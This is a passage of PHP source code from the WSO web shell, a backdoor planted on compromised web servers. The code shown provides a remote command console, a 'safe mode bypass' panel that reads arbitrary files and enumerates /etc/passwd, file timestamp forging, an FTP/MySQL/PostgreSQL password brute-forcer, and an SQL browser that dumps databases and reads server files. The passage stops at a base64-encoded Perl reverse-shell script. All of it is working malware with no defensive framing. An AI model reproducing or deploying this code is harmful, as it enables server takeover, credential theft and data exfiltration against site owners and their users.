  1210.                         $h[2] .= ' ';
  1211.                         break;
  1212.                     case 10:
  1213.                         $h[2] .= ' ';
  1214.                         break;
  1215.                     case 13:
  1216.                         $h[2] .= ' ';
  1217.                         break;
  1218.                     default:
  1219.                         $h[2] .= $c[$i];
  1220.                         break;
  1221.                 }
  1222.                 $n++;
  1223.                 if ($n == 32) {
  1224.                     $n = 0;
  1225.                     if ($i + 1 < $len) {
  1226.                         $h[0] .= sprintf('%08X', $i + 1) . '<br>';
  1227.                     }
  1228.                     $h[1] .= '<br>';
  1229.                     $h[2] .= "\n";
  1230.                 }
  1231.             }
  1232.             echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
  1233.             break;
  1234.         case 'rename':
  1235.             if (!empty($_POST['p3'])) {
  1236.                 if (!@rename($_POST['p1'], $_POST['p3']))
  1237.                     echo 'Can\'t rename!<br>';
  1238.                 else
  1239.                     die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
  1240.             }
  1241.             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
  1242.             break;
  1243.         case 'touch':
  1244.             if (!empty($_POST['p3'])) {
  1245.                 $time = strtotime($_POST['p3']);
  1246.                 if ($time) {
  1247.                     if (!touch($_POST['p1'], $time, $time))
  1248.                         echo 'Fail!';
  1249.                     else
  1250.                         echo 'Touched!';
  1251.                 } else
  1252.                     echo 'Bad time format!';
  1253.             }
  1254.             clearstatcache();
  1255.             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
  1256.             break;
  1257.     }
  1258.     echo '</div>';
  1259.     wsoFooter();
  1260. }
  1261. function actionSafeMode()
  1262. {
  1263.     $temp = '';
  1264.     ob_start();
  1265.     switch ($_POST['p1']) {
  1266.         case 1:
  1267.             $temp = @tempnam($test, 'cx');
  1268.             if (@copy("compress.zlib://" . $_POST['p2'], $temp)) {
  1269.                 echo @file_get_contents($temp);
  1270.                 unlink($temp);
  1271.             } else
  1272.                 echo 'Sorry... Can\'t open file';
  1273.             break;
  1274.         case 2:
  1275.             $files = glob($_POST['p2'] . '*');
  1276.             if (is_array($files))
  1277.                 foreach ($files as $filename)
  1278.                     echo $filename . "\n";
  1279.             break;
  1280.         case 3:
  1281.             $ch = curl_init("file://" . $_POST['p2'] . "\x00" . preg_replace('!\(\d+\)\s.*!', '', __FILE__));
  1282.             curl_exec($ch);
  1283.             break;
  1284.         case 4:
  1285.             ini_restore("safe_mode");
  1286.             ini_restore("open_basedir");
  1287.             include($_POST['p2']);
  1288.             break;
  1289.         case 5:
  1290.             for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
  1291.                 $uid = @posix_getpwuid($_POST['p2']);
  1292.                 if ($uid)
  1293.                     echo join(':', $uid) . "\n";
  1294.             }
  1295.             break;
  1296.     }
  1297.     $temp = ob_get_clean();
  1298.     wsoHeader();
  1299.     echo '<h1>Safe mode bypass</h1><div class=content>';
  1300.     echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
  1301.     if ($temp)
  1302.         echo '<pre class="ml1" style="margin-top:5px" id="Output">' . htmlspecialchars($temp) . '</pre>';
  1303.     echo '</div>';
  1304.     wsoFooter();
  1305. }
  1306. function actionConsole()
  1307. {
  1308.     if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
  1309.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] = true;
  1310.         $_POST['p1'] .= ' 2>&1';
  1311.     } elseif (!empty($_POST['p1']))
  1312.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] = false;
  1313.     if (isset($_POST['ajax'])) {
  1314.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
  1315.         ob_start();
  1316.         echo "d.cf.cmd.value='';\n";
  1317.         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']), "\n\r\t\\'\0"));
  1318.         if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
  1319.             if (@chdir($match[1])) {
  1320.                 $GLOBALS['cwd'] = @getcwd();
  1321.                 echo "c_='" . $GLOBALS['cwd'] . "';";
  1322.             }
  1323.         }
  1324.         echo "d.cf.output.value+='" . $temp . "';";
  1325.         echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
  1326.         $temp = ob_get_clean();
  1327.         echo strlen($temp), "\n", $temp;
  1328.         exit;
  1329.     }
  1330.     wsoHeader();
  1331.     echo "<script>
  1332. if(window.Event) window.captureEvents(Event.KEYDOWN);
  1333. var cmds = new Array('');
  1334. var cur = 0;
  1335. function kp(e) {
  1336.         var n = (window.Event) ? e.which : e.keyCode;
  1337.         if(n == 38) {
  1338.                 cur--;
  1339.                 if(cur>=0)
  1340.                         document.cf.cmd.value = cmds[cur];
  1341.                 else
  1342.                         cur++;
  1343.         } else if(n == 40) {
  1344.                 cur++;
  1345.                 if(cur < cmds.length)
  1346.                         document.cf.cmd.value = cmds[cur];
  1347.                 else
  1348.                         cur--;
  1349.         }
  1350. }
  1351. function add(cmd) {
  1352.         cmds.pop();
  1353.         cmds.push(cmd);
  1354.         cmds.push('');
  1355.         cur = cmds.length-1;
  1356. }
  1357. </script>";
  1358.     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
  1359.     foreach ($GLOBALS['aliases'] as $n => $v) {
  1360.         if ($v == '') {
  1361.             echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
  1362.             continue;
  1363.         }
  1364.         echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
  1365.     }
  1366.     if (empty($_POST['ajax']) && !empty($_POST['p1']))
  1367.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
  1368.     echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_SESSION[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
  1369.     if (!empty($_POST['p1'])) {
  1370.         echo htmlspecialchars("$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']));
  1371.     }
  1372.     echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
  1373.     echo '</form></div><script>d.cf.cmd.focus();</script>';
  1374.     wsoFooter();
  1375. }
  1376. function actionLogout()
  1377. {
  1378.     session_destroy();
  1379.     die('bye!');
  1380. }
  1381. function actionSelfRemove()
  1382. {
  1383.     if ($_POST['p1'] == 'yes')
  1384.         if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1385.             die('Shell has been removed');
  1386.         else
  1387.             echo 'unlink error!';
  1388.     if ($_POST['p1'] != 'yes')
  1389.         wsoHeader();
  1390.     echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1391.     wsoFooter();
  1392. }
  1393. function actionBruteforce()
  1394. {
  1395.     wsoHeader();
  1396.     if (isset($_POST['proto'])) {
  1397.         echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
  1398.         if ($_POST['proto'] == 'ftp') {
  1399.             function bruteForce($ip, $port, $login, $pass)
  1400.             {
  1401.                 $fp = @ftp_connect($ip, $port ? $port : 21);
  1402.                 if (!$fp)
  1403.                     return false;
  1404.                 $res = @ftp_login($fp, $login, $pass);
  1405.                 @ftp_close($fp);
  1406.                 return $res;
  1407.             }
  1408.         } elseif ($_POST['proto'] == 'mysql') {
  1409.             function bruteForce($ip, $port, $login, $pass)
  1410.             {
  1411.                 $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
  1412.                 @mysql_close($res);
  1413.                 return $res;
  1414.             }
  1415.         } elseif ($_POST['proto'] == 'pgsql') {
  1416.             function bruteForce($ip, $port, $login, $pass)
  1417.             {
  1418.                 $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
  1419.                 $res = @pg_connect($str);
  1420.                 @pg_close($res);
  1421.                 return $res;
  1422.             }
  1423.         }
  1424.         $success  = 0;
  1425.         $attempts = 0;
  1426.         $server   = explode(":", $_POST['server']);
  1427.         if ($_POST['type'] == 1) {
  1428.             $temp = @file('/etc/passwd');
  1429.             if (is_array($temp))
  1430.                 foreach ($temp as $line) {
  1431.                     $line = explode(":", $line);
  1432.                     ++$attempts;
  1433.                     if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
  1434.                         $success++;
  1435.                         echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
  1436.                     }
  1437.                     if (@$_POST['reverse']) {
  1438.                         $tmp = "";
  1439.                         for ($i = strlen($line[0]) - 1; $i >= 0; --$i)
  1440.                             $tmp .= $line[0][$i];
  1441.                         ++$attempts;
  1442.                         if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
  1443.                             $success++;
  1444.                             echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
  1445.                         }
  1446.                     }
  1447.                 }
  1448.         } elseif ($_POST['type'] == 2) {
  1449.             $temp = @file($_POST['dict']);
  1450.             if (is_array($temp))
  1451.                 foreach ($temp as $line) {
  1452.                     $line = trim($line);
  1453.                     ++$attempts;
  1454.                     if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) {
  1455.                         $success++;
  1456.                         echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
  1457.                     }
  1458.                 }
  1459.         }
  1460.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  1461.     }
  1462.     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
  1463.     echo '</div><br>';
  1464.     wsoFooter();
  1465. }
  1466. function actionSql()
  1467. {
  1468.     class DbClass
  1469.     {
  1470.         var $type;
  1471.         var $link;
  1472.         var $res;
  1473.         function DbClass($type)
  1474.         {
  1475.             $this->type = $type;
  1476.         }
  1477.         function connect($host, $user, $pass, $dbname)
  1478.         {
  1479.             switch ($this->type) {
  1480.                 case 'mysql':
  1481.                     if ($this->link = @mysql_connect($host, $user, $pass, true))
  1482.                         return true;
  1483.                     break;
  1484.                 case 'pgsql':
  1485.                     $host = explode(':', $host);
  1486.                     if (!$host[1])
  1487.                         $host[1] = 5432;
  1488.                     if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))
  1489.                         return true;
  1490.                     break;
  1491.             }
  1492.             return false;
  1493.         }
  1494.         function selectdb($db)
  1495.         {
  1496.             switch ($this->type) {
  1497.                 case 'mysql':
  1498.                     if (@mysql_select_db($db))
  1499.                         return true;
  1500.                     break;
  1501.             }
  1502.             return false;
  1503.         }
  1504.         function query($str)
  1505.         {
  1506.             switch ($this->type) {
  1507.                 case 'mysql':
  1508.                     return $this->res = @mysql_query($str);
  1509.                     break;
  1510.                 case 'pgsql':
  1511.                     return $this->res = @pg_query($this->link, $str);
  1512.                     break;
  1513.             }
  1514.             return false;
  1515.         }
  1516.         function fetch()
  1517.         {
  1518.             $res = func_num_args() ? func_get_arg(0) : $this->res;
  1519.             switch ($this->type) {
  1520.                 case 'mysql':
  1521.                     return @mysql_fetch_assoc($res);
  1522.                     break;
  1523.                 case 'pgsql':
  1524.                     return @pg_fetch_assoc($res);
  1525.                     break;
  1526.             }
  1527.             return false;
  1528.         }
  1529.         function listDbs()
  1530.         {
  1531.             switch ($this->type) {
  1532.                 case 'mysql':
  1533.                     return $this->query("SHOW databases");
  1534.                     break;
  1535.                 case 'pgsql':
  1536.                     return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
  1537.                     break;
  1538.             }
  1539.             return false;
  1540.         }
  1541.         function listTables()
  1542.         {
  1543.             switch ($this->type) {
  1544.                 case 'mysql':
  1545.                     return $this->res = $this->query('SHOW TABLES');
  1546.                     break;
  1547.                 case 'pgsql':
  1548.                     return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
  1549.                     break;
  1550.             }
  1551.             return false;
  1552.         }
  1553.         function error()
  1554.         {
  1555.             switch ($this->type) {
  1556.                 case 'mysql':
  1557.                     return @mysql_error();
  1558.                     break;
  1559.                 case 'pgsql':
  1560.                     return @pg_last_error();
  1561.                     break;
  1562.             }
  1563.             return false;
  1564.         }
  1565.         function setCharset($str)
  1566.         {
  1567.             switch ($this->type) {
  1568.                 case 'mysql':
  1569.                     if (function_exists('mysql_set_charset'))
  1570.                         return @mysql_set_charset($str, $this->link);
  1571.                     else
  1572.                         $this->query('SET CHARSET ' . $str);
  1573.                     break;
  1574.                 case 'pgsql':
  1575.                     return @pg_set_client_encoding($this->link, $str);
  1576.                     break;
  1577.             }
  1578.             return false;
  1579.         }
  1580.         function loadFile($str)
  1581.         {
  1582.             switch ($this->type) {
  1583.                 case 'mysql':
  1584.                     return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
  1585.                     break;
  1586.                 case 'pgsql':
  1587.                     $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;");
  1588.                     $r = array();
  1589.                     while ($i = $this->fetch())
  1590.                         $r[] = $i['file'];
  1591.                     $this->query('drop table wso2');
  1592.                     return array(
  1593.                         'file' => implode("\n", $r)
  1594.                     );
  1595.                     break;
  1596.             }
  1597.             return false;
  1598.         }
  1599.         function dump($table, $fp = false)
  1600.         {
  1601.             switch ($this->type) {
  1602.                 case 'mysql':
  1603.                     $res    = $this->query('SHOW CREATE TABLE `' . $table . '`');
  1604.                     $create = mysql_fetch_array($res);
  1605.                     $sql    = $create[1] . ";\n";
  1606.                     if ($fp)
  1607.                         fwrite($fp, $sql);
  1608.                     else
  1609.                         echo ($sql);
  1610.                     $this->query('SELECT * FROM `' . $table . '`');
  1611.                     $head = true;
  1612.                     while ($item = $this->fetch()) {
  1613.                         $columns = array();
  1614.                         foreach ($item as $k => $v) {
  1615.                             if ($v == null)
  1616.                                 $item[$k] = "NULL";
  1617.                             elseif (is_numeric($v))
  1618.                                 $item[$k] = $v;
  1619.                             else
  1620.                                 $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
  1621.                             $columns[] = "`" . $k . "`";
  1622.                         }
  1623.                         if ($head) {
  1624.                             $sql  = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
  1625.                             $head = false;
  1626.                         } else
  1627.                             $sql = "\n\t,(" . implode(", ", $item) . ')';
  1628.                         if ($fp)
  1629.                             fwrite($fp, $sql);
  1630.                         else
  1631.                             echo ($sql);
  1632.                     }
  1633.                     if (!$head)
  1634.                         if ($fp)
  1635.                             fwrite($fp, ";\n\n");
  1636.                         else
  1637.                             echo (";\n\n");
  1638.                     break;
  1639.                 case 'pgsql':
  1640.                     $this->query('SELECT * FROM ' . $table);
  1641.                     while ($item = $this->fetch()) {
  1642.                         $columns = array();
  1643.                         foreach ($item as $k => $v) {
  1644.                             $item[$k]  = "'" . addslashes($v) . "'";
  1645.                             $columns[] = $k;
  1646.                         }
  1647.                         $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
  1648.                         if ($fp)
  1649.                             fwrite($fp, $sql);
  1650.                         else
  1651.                             echo ($sql);
  1652.                     }
  1653.                     break;
  1654.             }
  1655.             return false;
  1656.         }
  1657.     }
  1658.     ;
  1659.     $db = new DbClass($_POST['type']);
  1660.     if (@$_POST['p2'] == 'download') {
  1661.         $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  1662.         $db->selectdb($_POST['sql_base']);
  1663.         switch ($_POST['charset']) {
  1664.             case "Windows-1251":
  1665.                 $db->setCharset('cp1251');
  1666.                 break;
  1667.             case "UTF-8":
  1668.                 $db->setCharset('utf8');
  1669.                 break;
  1670.             case "KOI8-R":
  1671.                 $db->setCharset('koi8r');
  1672.                 break;
  1673.             case "KOI8-U":
  1674.                 $db->setCharset('koi8u');
  1675.                 break;
  1676.             case "cp866":
  1677.                 $db->setCharset('cp866');
  1678.                 break;
  1679.         }
  1680.         if (empty($_POST['file'])) {
  1681.             ob_start("ob_gzhandler", 4096);
  1682.             header("Content-Disposition: attachment; filename=dump.sql");
  1683.             header("Content-Type: text/plain");
  1684.             foreach ($_POST['tbl'] as $v)
  1685.                 $db->dump($v);
  1686.             exit;
  1687.         } elseif ($fp = @fopen($_POST['file'], 'w')) {
  1688.             foreach ($_POST['tbl'] as $v)
  1689.                 $db->dump($v, $fp);
  1690.             fclose($fp);
  1691.             unset($_POST['p2']);
  1692.         } else
  1693.             die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
  1694.     }
  1695.     wsoHeader();
  1696.     echo "
  1697. <h1>Sql browser</h1><div class=content>
  1698. <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
  1699. <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
  1700. <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
  1701. <td><select name='type'><option value='mysql' ";
  1702.     if (@$_POST['type'] == 'mysql')
  1703.         echo 'selected';
  1704.     echo ">MySql</option><option value='pgsql' ";
  1705.     if (@$_POST['type'] == 'pgsql')
  1706.         echo 'selected';
  1707.     echo ">PostgreSql</option></select></td>
  1708. <td><input type=text name=sql_host value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>
  1709. <td><input type=text name=sql_login value='" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "'></td>
  1710. <td><input type=text name=sql_pass value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
  1711.     $tmp = "<input type=text name=sql_base value=''>";
  1712.     if (isset($_POST['sql_host'])) {
  1713.         if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  1714.             switch ($_POST['charset']) {
  1715.                 case "Windows-1251":
  1716.                     $db->setCharset('cp1251');
  1717.                     break;
  1718.                 case "UTF-8":
  1719.                     $db->setCharset('utf8');
  1720.                     break;
  1721.                 case "KOI8-R":
  1722.                     $db->setCharset('koi8r');
  1723.                     break;
  1724.                 case "KOI8-U":
  1725.                     $db->setCharset('koi8u');
  1726.                     break;
  1727.                 case "cp866":
  1728.                     $db->setCharset('cp866');
  1729.                     break;
  1730.             }
  1731.             $db->listDbs();
  1732.             echo "<select name=sql_base><option value=''></option>";
  1733.             while ($item = $db->fetch()) {
  1734.                 list($key, $value) = each($item);
  1735.                 echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
  1736.             }
  1737.             echo '</select>';
  1738.         } else
  1739.             echo $tmp;
  1740.     } else
  1741.         echo $tmp;
  1742.     echo "</td>
  1743.                                 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
  1744.                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
  1745.                         </tr>
  1746.                 </table>
  1747.                 <script>
  1748.            s_db='" . @addslashes($_POST['sql_base']) . "';
  1749.            function fs(f) {
  1750.                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
  1751.                    if(f.p1) f.p1.value='';
  1752.                    if(f.p2) f.p2.value='';
  1753.                    if(f.p3) f.p3.value='';
  1754.                }
  1755.            }
  1756.                         function st(t,l) {
  1757.                                 d.sf.p1.value = 'select';
  1758.                                 d.sf.p2.value = t;
  1759.                if(l && d.sf.p3) d.sf.p3.value = l;
  1760.                                 d.sf.submit();
  1761.                         }
  1762.                         function is() {
  1763.                                 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
  1764.                                         d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
  1765.                         }
  1766.                 </script>";
  1767.     if (isset($db) && $db->link) {
  1768.         echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  1769.         if (!empty($_POST['sql_base'])) {
  1770.             $db->selectdb($_POST['sql_base']);
  1771.             echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
  1772.             $tbls_res = $db->listTables();
  1773.             while ($item = $db->fetch($tbls_res)) {
  1774.                 list($key, $value) = each($item);
  1775.                 if (!empty($_POST['sql_count']))
  1776.                     $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
  1777.                 $value = htmlspecialchars($value);
  1778.                 echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small>({$n['n']})</small>") . "</nobr><br>";
  1779.             }
  1780.             echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
  1781.             if (@$_POST['p1'] == 'select') {
  1782.                 $_POST['p1'] = 'query';
  1783.                 $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
  1784.                 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
  1785.                 $num   = $db->fetch();
  1786.                 $pages = ceil($num['n'] / 30);
  1787.                 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int) $_POST['p3']) . ">";
  1788.                 echo " of $pages";
  1789.                 if ($_POST['p3'] > 1)
  1790.                     echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>&lt; Prev</a>";
  1791.                 if ($_POST['p3'] < $pages)
  1792.                     echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next &gt;</a>";
  1793.                 $_POST['p3']--;
  1794.                 if ($_POST['type'] == 'pgsql')
  1795.                     $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
  1796.                 else
  1797.                     $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
  1798.                 echo "<br><br>";
  1799.             }
  1800.             if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
  1801.                 $db->query(@$_POST['p2']);
  1802.                 if ($db->res !== false) {
  1803.                     $title = false;
  1804.                     echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
  1805.                     $line = 1;
  1806.                     while ($item = $db->fetch()) {
  1807.                         if (!$title) {
  1808.                             echo '<tr>';
  1809.                             foreach ($item as $key => $value)
  1810.                                 echo '<th>' . $key . '</th>';
  1811.                             reset($item);
  1812.                             $title = true;
  1813.                             echo '</tr><tr>';
  1814.                             $line = 2;
  1815.                         }
  1816.                         echo '<tr class="l' . $line . '">';
  1817.                         $line = $line == 1 ? 2 : 1;
  1818.                         foreach ($item as $key => $value) {
  1819.                             if ($value == null)
  1820.                                 echo '<td><i>null</i></td>';
  1821.                             else
  1822.                                 echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
  1823.                         }
  1824.                         echo '</tr>';
  1825.                     }
  1826.                     echo '</table>';
  1827.                 } else {
  1828.                     echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
  1829.                 }
  1830.             }
  1831.             echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
  1832.             if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
  1833.                 echo htmlspecialchars($_POST['p2']);
  1834.             echo "</textarea><br/><input type=submit value='Execute'>";
  1835.             echo "</td></tr>";
  1836.         }
  1837.         echo "</table></form><br/>";
  1838.         if ($_POST['type'] == 'mysql') {
  1839.             $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
  1840.             if ($db->fetch())
  1841.                 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  1842.         }
  1843.         if (@$_POST['p1'] == 'loadfile') {
  1844.             $file = $db->loadFile($_POST['p2']);
  1845.             echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
  1846.         }
  1847.     } else {
  1848.         echo htmlspecialchars($db->error());
  1849.     }
  1850.     echo '</div>';
  1851.     wsoFooter();
  1852. }
  1853. function actionNetwork()
  1854. {
  1855.     wsoHeader();
  1856.     $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
